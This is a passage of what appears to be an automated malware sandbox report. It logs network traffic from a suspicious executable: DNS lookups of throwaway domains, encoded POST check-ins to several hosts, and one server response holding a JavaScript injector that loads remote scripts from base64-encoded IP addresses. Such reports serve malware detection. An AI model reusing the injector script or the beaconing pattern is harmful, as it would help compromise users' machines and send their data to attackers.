                                                                                                                                    Jan 10, 2025 19:48:13.742569923 CET5002780192.168.2.4124.6.61.130
                                                                                                                                    Jan 10, 2025 19:48:13.747499943 CET8050027124.6.61.130192.168.2.4
                                                                                                                                    Jan 10, 2025 19:48:13.747539997 CET8050027124.6.61.130192.168.2.4
                                                                                                                                    Jan 10, 2025 19:48:13.747675896 CET8050027124.6.61.130192.168.2.4
                                                                                                                                    Jan 10, 2025 19:48:13.747684956 CET8050027124.6.61.130192.168.2.4
                                                                                                                                    Jan 10, 2025 19:48:13.747701883 CET8050027124.6.61.130192.168.2.4
                                                                                                                                    Jan 10, 2025 19:48:13.747719049 CET8050027124.6.61.130192.168.2.4
                                                                                                                                    Jan 10, 2025 19:48:13.747816086 CET8050027124.6.61.130192.168.2.4
                                                                                                                                    Jan 10, 2025 19:48:13.747824907 CET8050027124.6.61.130192.168.2.4
                                                                                                                                    Jan 10, 2025 19:48:13.747881889 CET8050027124.6.61.130192.168.2.4
                                                                                                                                    Jan 10, 2025 19:48:15.249597073 CET5002780192.168.2.4124.6.61.130
                                                                                                                                    Jan 10, 2025 19:48:15.254545927 CET8050027124.6.61.130192.168.2.4
                                                                                                                                    Jan 10, 2025 19:48:15.254626036 CET5002780192.168.2.4124.6.61.130
                                                                                                                                    Jan 10, 2025 19:48:16.268377066 CET5002880192.168.2.4124.6.61.130
                                                                                                                                    Jan 10, 2025 19:48:16.273286104 CET8050028124.6.61.130192.168.2.4
                                                                                                                                    Jan 10, 2025 19:48:16.273377895 CET5002880192.168.2.4124.6.61.130
                                                                                                                                    Jan 10, 2025 19:48:16.282807112 CET5002880192.168.2.4124.6.61.130
                                                                                                                                    Jan 10, 2025 19:48:16.287677050 CET8050028124.6.61.130192.168.2.4
                                                                                                                                    Jan 10, 2025 19:48:18.383856058 CET8050028124.6.61.130192.168.2.4
                                                                                                                                    Jan 10, 2025 19:48:18.384073973 CET8050028124.6.61.130192.168.2.4
                                                                                                                                    Jan 10, 2025 19:48:18.386830091 CET5002880192.168.2.4124.6.61.130
                                                                                                                                    Jan 10, 2025 19:48:18.386830091 CET5002880192.168.2.4124.6.61.130
                                                                                                                                    Jan 10, 2025 19:48:18.391638041 CET8050028124.6.61.130192.168.2.4

                                                                                                                                    UDP Packets

                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                    Jan 10, 2025 19:46:19.718550920 CET6106853192.168.2.41.1.1.1
                                                                                                                                    Jan 10, 2025 19:46:20.584223032 CET53610681.1.1.1192.168.2.4
                                                                                                                                    Jan 10, 2025 19:46:41.238486052 CET5929753192.168.2.41.1.1.1
                                                                                                                                    Jan 10, 2025 19:46:41.265681028 CET53592971.1.1.1192.168.2.4
                                                                                                                                    Jan 10, 2025 19:46:54.409233093 CET5079953192.168.2.41.1.1.1
                                                                                                                                    Jan 10, 2025 19:46:54.446131945 CET53507991.1.1.1192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:28.519412041 CET5924253192.168.2.41.1.1.1
                                                                                                                                    Jan 10, 2025 19:47:28.559839964 CET53592421.1.1.1192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:42.066031933 CET6474753192.168.2.41.1.1.1
                                                                                                                                    Jan 10, 2025 19:47:42.474529982 CET53647471.1.1.1192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:56.065545082 CET4958753192.168.2.41.1.1.1
                                                                                                                                    Jan 10, 2025 19:47:57.062063932 CET4958753192.168.2.41.1.1.1
                                                                                                                                    Jan 10, 2025 19:47:58.004179955 CET53495871.1.1.1192.168.2.4
                                                                                                                                    Jan 10, 2025 19:47:58.007451057 CET53495871.1.1.1192.168.2.4
                                                                                                                                    Jan 10, 2025 19:48:01.048032999 CET5269953192.168.2.41.1.1.1
                                                                                                                                    Jan 10, 2025 19:48:02.458698034 CET5269953192.168.2.41.1.1.1
                                                                                                                                    Jan 10, 2025 19:48:03.453915119 CET5269953192.168.2.41.1.1.1
                                                                                                                                    Jan 10, 2025 19:48:03.535159111 CET53526991.1.1.1192.168.2.4
                                                                                                                                    Jan 10, 2025 19:48:03.535175085 CET53526991.1.1.1192.168.2.4
                                                                                                                                    Jan 10, 2025 19:48:03.535180092 CET53526991.1.1.1192.168.2.4
                                                                                                                                    Jan 10, 2025 19:48:08.551415920 CET5544753192.168.2.41.1.1.1
                                                                                                                                    Jan 10, 2025 19:48:08.562954903 CET53554471.1.1.1192.168.2.4

                                                                                                                                    DNS Queries

                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                    Jan 10, 2025 19:46:19.718550920 CET192.168.2.41.1.1.10x95ecStandard query (0)www.jgkgf.clubA (IP address)IN (0x0001)false
                                                                                                                                    Jan 10, 2025 19:46:41.238486052 CET192.168.2.41.1.1.10x2f43Standard query (0)www.hsa.worldA (IP address)IN (0x0001)false
                                                                                                                                    Jan 10, 2025 19:46:54.409233093 CET192.168.2.41.1.1.10x82bbStandard query (0)www.sssvip2.shopA (IP address)IN (0x0001)false
                                                                                                                                    Jan 10, 2025 19:47:28.519412041 CET192.168.2.41.1.1.10xaccfStandard query (0)www.dutchdubliners.onlineA (IP address)IN (0x0001)false
                                                                                                                                    Jan 10, 2025 19:47:42.066031933 CET192.168.2.41.1.1.10xbc35Standard query (0)www.allstary.topA (IP address)IN (0x0001)false
                                                                                                                                    Jan 10, 2025 19:47:56.065545082 CET192.168.2.41.1.1.10x5a5eStandard query (0)www.16v9tiu00r.inkA (IP address)IN (0x0001)false
                                                                                                                                    Jan 10, 2025 19:47:57.062063932 CET192.168.2.41.1.1.10x5a5eStandard query (0)www.16v9tiu00r.inkA (IP address)IN (0x0001)false
                                                                                                                                    Jan 10, 2025 19:48:01.048032999 CET192.168.2.41.1.1.10x94a8Standard query (0)www.16v9tiu00r.inkA (IP address)IN (0x0001)false
                                                                                                                                    Jan 10, 2025 19:48:02.458698034 CET192.168.2.41.1.1.10x94a8Standard query (0)www.16v9tiu00r.inkA (IP address)IN (0x0001)false
                                                                                                                                    Jan 10, 2025 19:48:03.453915119 CET192.168.2.41.1.1.10x94a8Standard query (0)www.16v9tiu00r.inkA (IP address)IN (0x0001)false
                                                                                                                                    Jan 10, 2025 19:48:08.551415920 CET192.168.2.41.1.1.10xc832Standard query (0)www.comect.onlineA (IP address)IN (0x0001)false

                                                                                                                                    DNS Answers

                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                    Jan 10, 2025 19:46:20.584223032 CET1.1.1.1192.168.2.40x95ecNo error (0)www.jgkgf.clubccchhua889911.222tt.icuCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Jan 10, 2025 19:46:20.584223032 CET1.1.1.1192.168.2.40x95ecNo error (0)ccchhua889911.222tt.icu172.247.112.164A (IP address)IN (0x0001)false
                                                                                                                                    Jan 10, 2025 19:46:41.265681028 CET1.1.1.1192.168.2.40x2f43No error (0)www.hsa.world13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                                    Jan 10, 2025 19:46:41.265681028 CET1.1.1.1192.168.2.40x2f43No error (0)www.hsa.world76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                                    Jan 10, 2025 19:46:54.446131945 CET1.1.1.1192.168.2.40x82bbNo error (0)www.sssvip2.shop156.253.8.115A (IP address)IN (0x0001)false
                                                                                                                                    Jan 10, 2025 19:47:28.559839964 CET1.1.1.1192.168.2.40xaccfNo error (0)www.dutchdubliners.onlinedutchdubliners.onlineCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Jan 10, 2025 19:47:28.559839964 CET1.1.1.1192.168.2.40xaccfNo error (0)dutchdubliners.online37.97.254.27A (IP address)IN (0x0001)false
                                                                                                                                    Jan 10, 2025 19:47:42.474529982 CET1.1.1.1192.168.2.40xbc35No error (0)www.allstary.top199.193.6.134A (IP address)IN (0x0001)false
                                                                                                                                    Jan 10, 2025 19:47:58.004179955 CET1.1.1.1192.168.2.40x5a5eNo error (0)www.16v9tiu00r.inkhx2.vip.84dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Jan 10, 2025 19:47:58.007451057 CET1.1.1.1192.168.2.40x5a5eNo error (0)www.16v9tiu00r.inkhx2.vip.84dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Jan 10, 2025 19:48:03.535159111 CET1.1.1.1192.168.2.40x94a8No error (0)www.16v9tiu00r.inkhx2.vip.84dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Jan 10, 2025 19:48:03.535175085 CET1.1.1.1192.168.2.40x94a8No error (0)www.16v9tiu00r.inkhx2.vip.84dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Jan 10, 2025 19:48:03.535180092 CET1.1.1.1192.168.2.40x94a8No error (0)www.16v9tiu00r.inkhx2.vip.84dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                    Jan 10, 2025 19:48:08.562954903 CET1.1.1.1192.168.2.40xc832No error (0)www.comect.online124.6.61.130A (IP address)IN (0x0001)false

                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                    • www.jgkgf.club
                                                                                                                                    • www.hsa.world
                                                                                                                                    • www.sssvip2.shop
                                                                                                                                    • www.dutchdubliners.online
                                                                                                                                    • www.allstary.top
                                                                                                                                    • www.comect.online

                                                                                                                                    HTTP Packets

                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    0192.168.2.449843172.247.112.164805780C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Jan 10, 2025 19:46:20.606928110 CET495OUTGET /tvkp/?EzZ=KBC+qdhE4CeEPBlRbbr/xAo9xQXJnANs+ntD2JrTvmvKK8JoxnFP1tf4O24DvVFUTK8itIRNWKwGZ9ngU4oiptFTC0rH1QaQq1CS+53i55AcWe9W8nwBWKs=&BjRxb=8r70fhQxdN4lRB HTTP/1.1
                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                    Host: www.jgkgf.club
                                                                                                                                    Connection: close
                                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                    Jan 10, 2025 19:46:21.127095938 CET524INHTTP/1.0 200 OK
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: max-age=259200
                                                                                                                                    Content-Type: text/html;charset=utf-8
                                                                                                                                    Content-Length: 395
                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 66 75 6e 63 74 69 6f 6e 20 4e 28 63 29 7b 76 61 72 20 61 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 76 61 72 20 73 74 72 55 3d 61 74 6f 62 28 63 29 2b 22 2f 22 2b 62 74 6f 61 28 22 75 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2b 22 26 70 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 29 2b 27 2e 6a 73 27 3b 61 2e 73 72 63 3d 73 74 72 55 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 62 6f 64 79 22 29 5b 30 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 7d 4e 28 22 61 48 52 30 63 48 4d 36 4c 79 38 78 4f 54 51 75 4d 54 51 33 4c 6a 6b 35 4c 6a 49 30 4e 54 6f 78 4d 54 63 78 4f 41 3d 3d 22 29 3b 4e 28 22 61 48 52 30 63 [TRUNCATED]
                                                                                                                                    Data Ascii: <html><head></head><body><script type="text/javascript">function N(c){var a=document.createElement("script");var strU=atob(c)+"/"+btoa("u="+window.location+"&p="+window.location.pathname+window.location.search)+'.js';a.src=strU;document.getElementsByTagName("body")[0].appendChild(a)}N("aHR0cHM6Ly8xOTQuMTQ3Ljk5LjI0NToxMTcxOA==");N("aHR0cHM6Ly8xNTYuMjI3LjEuODQ6NTExOA==");</script></body></html>


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    1192.168.2.44997013.248.169.48805780C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Jan 10, 2025 19:46:41.286834002 CET743OUTPOST /09b7/ HTTP/1.1
                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                    Host: www.hsa.world
                                                                                                                                    Origin: http://www.hsa.world
                                                                                                                                    Content-Length: 200
                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    Connection: close
                                                                                                                                    Referer: http://www.hsa.world/09b7/
                                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                    Data Raw: 45 7a 5a 3d 39 52 4c 34 4a 48 6f 6c 2f 6c 56 69 46 45 59 61 68 58 4b 42 4a 71 55 52 54 36 4a 52 45 39 56 50 79 44 41 33 6d 79 39 33 45 44 2f 59 45 4c 6c 34 36 35 4d 43 48 32 39 6a 57 57 66 46 5a 78 48 64 76 44 76 71 58 64 4c 38 51 6b 4f 6c 58 43 38 2b 34 4a 4a 75 71 46 35 6e 63 77 39 65 73 4b 57 51 4c 71 72 30 63 76 6c 6a 72 6f 36 66 6a 62 69 41 59 4e 42 6a 4d 49 57 50 76 44 68 4d 61 37 53 30 66 37 67 62 45 6f 6e 6e 49 59 53 59 56 32 6c 54 42 7a 62 79 55 33 76 58 31 74 54 62 4e 53 4f 62 53 4f 32 79 69 34 4c 63 73 72 47 67 53 6e 7a 58 70 76 45 32 4f 59 41 54 31 78 69 4c 6f 64 49 58 57 77 3d 3d
                                                                                                                                    Data Ascii: EzZ=9RL4JHol/lViFEYahXKBJqURT6JRE9VPyDA3my93ED/YELl465MCH29jWWfFZxHdvDvqXdL8QkOlXC8+4JJuqF5ncw9esKWQLqr0cvljro6fjbiAYNBjMIWPvDhMa7S0f7gbEonnIYSYV2lTBzbyU3vX1tTbNSObSO2yi4LcsrGgSnzXpvE2OYAT1xiLodIXWw==
                                                                                                                                    Jan 10, 2025 19:46:41.772420883 CET73INHTTP/1.1 405 Method Not Allowed
                                                                                                                                    content-length: 0
                                                                                                                                    connection: close


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    2192.168.2.44998713.248.169.48805780C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Jan 10, 2025 19:46:43.835413933 CET763OUTPOST /09b7/ HTTP/1.1
                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                    Host: www.hsa.world
                                                                                                                                    Origin: http://www.hsa.world
                                                                                                                                    Content-Length: 220
                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    Connection: close
                                                                                                                                    Referer: http://www.hsa.world/09b7/
                                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                    Data Raw: 45 7a 5a 3d 39 52 4c 34 4a 48 6f 6c 2f 6c 56 69 46 6e 41 61 6a 30 69 42 4d 4b 55 57 50 4b 4a 52 4f 64 56 4c 79 43 38 33 6d 7a 49 36 46 78 4c 59 46 71 56 34 6f 4d 34 43 4b 57 39 6a 64 32 66 4d 55 52 48 57 76 44 72 55 58 59 72 38 51 67 65 6c 58 41 30 2b 34 36 68 74 72 56 35 6c 46 67 39 63 68 71 57 51 4c 71 72 30 63 73 5a 46 72 72 4b 66 6a 71 53 41 4b 2b 5a 6b 50 49 57 4f 34 7a 68 4d 65 37 53 34 66 37 68 4d 45 70 71 49 49 61 36 59 56 33 56 54 42 68 7a 78 42 6e 76 5a 72 64 53 65 64 41 2b 65 51 2f 4c 79 6d 37 6e 62 6d 4a 43 6c 61 42 2b 4e 34 65 6c 68 63 59 6b 67 6f 32 72 2f 6c 65 31 65 4e 31 31 75 66 6b 55 7a 30 42 66 31 38 49 67 61 72 74 76 55 4a 39 63 3d
                                                                                                                                    Data Ascii: EzZ=9RL4JHol/lViFnAaj0iBMKUWPKJROdVLyC83mzI6FxLYFqV4oM4CKW9jd2fMURHWvDrUXYr8QgelXA0+46htrV5lFg9chqWQLqr0csZFrrKfjqSAK+ZkPIWO4zhMe7S4f7hMEpqIIa6YV3VTBhzxBnvZrdSedA+eQ/Lym7nbmJClaB+N4elhcYkgo2r/le1eN11ufkUz0Bf18IgartvUJ9c=


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    3192.168.2.45000313.248.169.48805780C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Jan 10, 2025 19:46:46.381752968 CET10845OUTPOST /09b7/ HTTP/1.1
                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                    Host: www.hsa.world
                                                                                                                                    Origin: http://www.hsa.world
                                                                                                                                    Content-Length: 10300
                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    Connection: close
                                                                                                                                    Referer: http://www.hsa.world/09b7/
                                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                    Data Raw: 45 7a 5a 3d 39 52 4c 34 4a 48 6f 6c 2f 6c 56 69 46 6e 41 61 6a 30 69 42 4d 4b 55 57 50 4b 4a 52 4f 64 56 4c 79 43 38 33 6d 7a 49 36 46 78 7a 59 46 59 4e 34 35 66 51 43 4c 57 39 6a 51 57 66 42 55 52 48 4c 76 43 50 51 58 59 6d 42 51 69 57 6c 56 69 4d 2b 2b 4c 68 74 6c 56 35 6c 59 77 39 64 73 4b 58 45 4c 71 62 77 63 73 4a 46 72 72 4b 66 6a 70 4b 41 61 39 42 6b 43 6f 57 50 76 44 68 36 61 37 53 55 66 34 52 63 45 70 2b 69 49 4b 61 59 56 55 39 54 48 55 48 78 63 58 76 62 71 64 53 34 64 41 7a 4f 51 2b 6e 45 6d 36 54 39 6d 4c 65 6c 65 58 33 51 6f 66 67 37 46 62 38 62 2b 48 62 6b 6a 4e 4a 45 4c 32 41 62 62 6e 77 47 67 42 48 69 78 71 39 53 75 50 4f 56 58 37 39 6d 67 65 77 66 38 71 4f 50 75 68 77 78 69 54 7a 6b 4c 70 44 39 4b 41 71 66 37 62 4c 50 51 59 45 68 51 31 42 42 45 48 59 51 7a 56 74 7a 6a 4c 4e 4b 4d 32 62 41 4e 70 5a 67 69 69 48 54 36 31 50 51 6a 35 38 53 6d 48 56 66 49 59 36 76 31 31 42 38 58 38 4c 53 41 65 58 74 46 4b 61 63 61 41 67 52 61 65 6a 32 46 6f 53 2b 75 57 43 69 30 6d 52 4c 51 69 4d 6d 67 58 [TRUNCATED]
                                                                                                                                    Data Ascii: EzZ=9RL4JHol/lViFnAaj0iBMKUWPKJROdVLyC83mzI6FxzYFYN45fQCLW9jQWfBURHLvCPQXYmBQiWlViM++LhtlV5lYw9dsKXELqbwcsJFrrKfjpKAa9BkCoWPvDh6a7SUf4RcEp+iIKaYVU9THUHxcXvbqdS4dAzOQ+nEm6T9mLeleX3Qofg7Fb8b+HbkjNJEL2AbbnwGgBHixq9SuPOVX79mgewf8qOPuhwxiTzkLpD9KAqf7bLPQYEhQ1BBEHYQzVtzjLNKM2bANpZgiiHT61PQj58SmHVfIY6v11B8X8LSAeXtFKacaAgRaej2FoS+uWCi0mRLQiMmgX1NZsKwKJnGwHHvQT6EuY0wxYOHFUitJmjdeuD9zZg8wb4IrWUIDMfebv3qVGzBBxzgbxmGFNO9k7wfYulxMnICiFX5Fnl1BdVeFbGVZ1j1gWhF9TQH57fIWc9/spmrqnSALpN5mUZbapuX/Js9vxXetoTpF9IyB2eWYlcjz0EMKf3I/QWTK6v4D4MKB5O8jGgk6ppOgaR8QKiqONz2FX3ccQ0yJE2eJqgRcdbA5DCXqEv6rOPZtalyHr3NtExBB26AzOQvpsCVkVygFQ4Rs999kIy9sseDf0WxETOCODKVKoLgZxsbI/Hz8Hi8CjcWm9kOPUiNTn1U3OgzGeZvSaz//F5nnAjfelProzIXXlF6hn9hKkQKOVxsuwBAbfIFsSHWYsrV3tb+zJkZwOHssF1mR9+VWCoVgjJc+GtygS54DjfOarzBR28WQ39OG2EzkGzIWq/R/x5D1arXxe8x7W/7QojXOD7TKWVoGqSMBW8NGn0w13wQSiUQgaZbgH4AawDGCmTmkyNVFOk6tBvtz+2O45OkkDEEDlAnlYbo1SvVYwZqABPSVWiIUQrxFObEevIKJ3zluQJj1tCfA2M51P5GHHBC0Hgu/43s4qV13ZgtMy/L45uKtSAU8MIzkl2zFJu28TheJsSOMDXGVytgCOkCoxuUJOVz/GsS [TRUNCATED]
                                                                                                                                    Jan 10, 2025 19:46:46.859031916 CET73INHTTP/1.1 405 Method Not Allowed
                                                                                                                                    content-length: 0
                                                                                                                                    connection: close


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    4192.168.2.45001213.248.169.48805780C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Jan 10, 2025 19:46:48.924024105 CET494OUTGET /09b7/?EzZ=wTjYKy4Z1nhyNUYrgXWsKJYXRpEsDt53124S1AstIAPOGsN31c9TK1Z0TGDrPCbSlF/hfKeGaCXGdC0XkMxI0HZmVwdipOTzBPLQAeRKmoWWrOKaVcJIZso=&BjRxb=8r70fhQxdN4lRB HTTP/1.1
                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                    Host: www.hsa.world
                                                                                                                                    Connection: close
                                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                    Jan 10, 2025 19:46:49.387398958 CET381INHTTP/1.1 200 OK
                                                                                                                                    content-type: text/html
                                                                                                                                    date: Fri, 10 Jan 2025 18:46:49 GMT
                                                                                                                                    content-length: 260
                                                                                                                                    connection: close
                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 45 7a 5a 3d 77 54 6a 59 4b 79 34 5a 31 6e 68 79 4e 55 59 72 67 58 57 73 4b 4a 59 58 52 70 45 73 44 74 35 33 31 32 34 53 31 41 73 74 49 41 50 4f 47 73 4e 33 31 63 39 54 4b 31 5a 30 54 47 44 72 50 43 62 53 6c 46 2f 68 66 4b 65 47 61 43 58 47 64 43 30 58 6b 4d 78 49 30 48 5a 6d 56 77 64 69 70 4f 54 7a 42 50 4c 51 41 65 52 4b 6d 6f 57 57 72 4f 4b 61 56 63 4a 49 5a 73 6f 3d 26 42 6a 52 78 62 3d 38 72 37 30 66 68 51 78 64 4e 34 6c 52 42 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?EzZ=wTjYKy4Z1nhyNUYrgXWsKJYXRpEsDt53124S1AstIAPOGsN31c9TK1Z0TGDrPCbSlF/hfKeGaCXGdC0XkMxI0HZmVwdipOTzBPLQAeRKmoWWrOKaVcJIZso=&BjRxb=8r70fhQxdN4lRB"}</script></head></html>


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    5192.168.2.450013156.253.8.115805780C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Jan 10, 2025 19:46:54.468764067 CET752OUTPOST /6t0f/ HTTP/1.1
                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                    Host: www.sssvip2.shop
                                                                                                                                    Origin: http://www.sssvip2.shop
                                                                                                                                    Content-Length: 200
                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    Connection: close
                                                                                                                                    Referer: http://www.sssvip2.shop/6t0f/
                                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SM-N910F-ORANGE Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                    Data Raw: 45 7a 5a 3d 42 61 55 32 4b 42 56 4f 30 6b 66 45 66 41 52 74 4e 70 4d 4e 39 66 56 39 77 52 74 70 38 73 44 4e 45 72 4a 66 44 4f 35 4f 68 36 78 39 4b 42 58 6f 33 4e 71 2f 4b 6a 62 66 38 4a 74 5a 67 49 2b 6a 74 49 41 44 4b 6a 49 63 34 58 6f 69 44 4f 75 65 74 48 50 6a 41 71 59 53 47 46 77 43 36 30 41 33 55 6f 59 67 66 39 66 36 74 70 45 70 69 76 76 42 71 36 73 72 64 77 44 47 53 65 43 44 65 36 49 4f 54 57 76 51 37 75 64 36 48 2f 4b 5a 42 59 6f 70 32 30 72 78 77 2f 4a 59 2b 67 43 38 76 64 50 59 7a 49 43 6c 56 69 7a 6a 32 77 4f 46 4c 4c 35 78 6c 34 79 70 59 78 4b 71 43 35 67 76 35 4b 75 4b 76 77 3d 3d
                                                                                                                                    Data Ascii: EzZ=BaU2KBVO0kfEfARtNpMN9fV9wRtp8sDNErJfDO5Oh6x9KBXo3Nq/Kjbf8JtZgI+jtIADKjIc4XoiDOuetHPjAqYSGFwC60A3UoYgf9f6tpEpivvBq6srdwDGSeCDe6IOTWvQ7ud6H/KZBYop20rxw/JY+gC8vdPYzIClVizj2wOFLL5xl4ypYxKqC5gv5KuKvw==


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    6192.168.2.450014156.253.8.115805780C:\Program Files (x86)\OlCeqyMasceJeGlLEeBAPFeRWpDrRYcdeVThMuRdbyIQO\cqvjCApYGBKzop.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Jan 10, 2025 19:46:57.022177935 CET772OUTPOST /6t0f/ HTTP/1.1
                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                    Host: www.sssvip2.shop
                                                                                                                                    Origin: http://www.sssvip2.shop
                                                                                                                                    Content-Length: 220
                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    Connection: close
                                                                                                                                    Referer: http://www.sssvip2.shop/6t0f/
